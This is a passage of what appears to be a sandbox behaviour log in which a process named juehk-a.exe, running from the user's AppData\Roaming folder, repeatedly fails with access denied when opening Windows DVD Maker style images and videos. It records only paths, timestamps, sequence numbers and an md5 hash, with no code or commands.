- value: C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_VideoInset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90272
- mode: failed
- sequenceNumber: 1817
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90276
- mode: failed
- sequenceNumber: 1818
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90283
- mode: failed
- sequenceNumber: 1819
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_VideoInset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90290
- mode: failed
- sequenceNumber: 1820
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\babyblue.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90297
- mode: failed
- sequenceNumber: 1821
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90303
- mode: failed
- sequenceNumber: 1822
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90310
- mode: failed
- sequenceNumber: 1823
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90318
- mode: failed
- sequenceNumber: 1824
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90325
- mode: failed
- sequenceNumber: 1825
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90333
- mode: failed
- sequenceNumber: 1826
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90340
- mode: failed
- sequenceNumber: 1827
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90348
- mode: failed
- sequenceNumber: 1828
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyNotesBackground_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90355
- mode: failed
- sequenceNumber: 1829
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90375
- mode: failed
- sequenceNumber: 1830
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90382
- mode: failed
- sequenceNumber: 1831
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90390
- mode: failed
- sequenceNumber: 1832
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90397
- mode: failed
- sequenceNumber: 1833
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90403
- mode: failed
- sequenceNumber: 1834
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_leftarrow.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90410
- mode: failed
- sequenceNumber: 1835
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90418
- mode: failed
- sequenceNumber: 1836
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_uparrow.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90427
- mode: failed
- sequenceNumber: 1837
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90434
- mode: failed
- sequenceNumber: 1838
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90441
- mode: failed
- sequenceNumber: 1839
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-image-mask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90448
- mode: failed
- sequenceNumber: 1840
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\babypink.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90454
- mode: failed
- sequenceNumber: 1841
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90462
- mode: failed
- sequenceNumber: 1842
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_matte2.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90469
- mode: failed
- sequenceNumber: 1843
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90476
- mode: failed
- sequenceNumber: 1844
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90483
- mode: failed
- sequenceNumber: 1845
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_RGB6_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90490
- mode: failed
- sequenceNumber: 1846
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90497
- mode: failed
- sequenceNumber: 1847
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90504
- mode: failed
- sequenceNumber: 1848
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90510
- mode: failed
- sequenceNumber: 1849
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\button-highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90517
- mode: failed
- sequenceNumber: 1850
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90524
- mode: failed
- sequenceNumber: 1851
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90530
- mode: failed
- sequenceNumber: 1852
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90535
- mode: failed
- sequenceNumber: 1853
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\curtains.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90542
- mode: failed
- sequenceNumber: 1854
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90548
- mode: failed
- sequenceNumber: 1855
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90554
- mode: failed
- sequenceNumber: 1856
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90561
- mode: failed
- sequenceNumber: 1857
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_MATTE_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90566
- mode: failed
- sequenceNumber: 1858
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90573
- mode: failed
- sequenceNumber: 1859
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90579
- mode: failed
- sequenceNumber: 1860
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90585
- mode: failed
- sequenceNumber: 1861
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\mainimage-mask.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90591
- mode: failed
- sequenceNumber: 1862
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\notes-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90597
- mode: failed
- sequenceNumber: 1863
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90605
- mode: failed
- sequenceNumber: 1864
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_glass.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90612
- mode: failed
- sequenceNumber: 1865
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_selectionsubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90619
- mode: failed
- sequenceNumber: 1866
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\circleround_videoinset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90626
- mode: failed
- sequenceNumber: 1867
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90631
- mode: failed
- sequenceNumber: 1868
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureA.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90638
- mode: failed
- sequenceNumber: 1869
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_SelectionSubpictureB.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90644
- mode: failed
- sequenceNumber: 1870
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90651
- mode: failed
- sequenceNumber: 1871
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90661
- mode: failed
- sequenceNumber: 1872
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90688
- mode: failed
- sequenceNumber: 1873
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90695
- mode: failed
- sequenceNumber: 1874
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90701
- mode: failed
- sequenceNumber: 1875
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationLeft_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90707
- mode: failed
- sequenceNumber: 1876
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90714
- mode: failed
- sequenceNumber: 1877
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90721
- mode: failed
- sequenceNumber: 1878
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90727
- mode: failed
- sequenceNumber: 1879
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90735
- mode: failed
- sequenceNumber: 1880
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90743
- mode: failed
- sequenceNumber: 1881
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\1047x576black.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90748
- mode: failed
- sequenceNumber: 1882
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\15x15dot.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90754
- mode: failed
- sequenceNumber: 1883
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotsdarkoverlay.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90759
- mode: failed
- sequenceNumber: 1884
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90765
- mode: failed
- sequenceNumber: 1885
- value: C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 90771
- mode: failed
- sequenceNumber: 1886
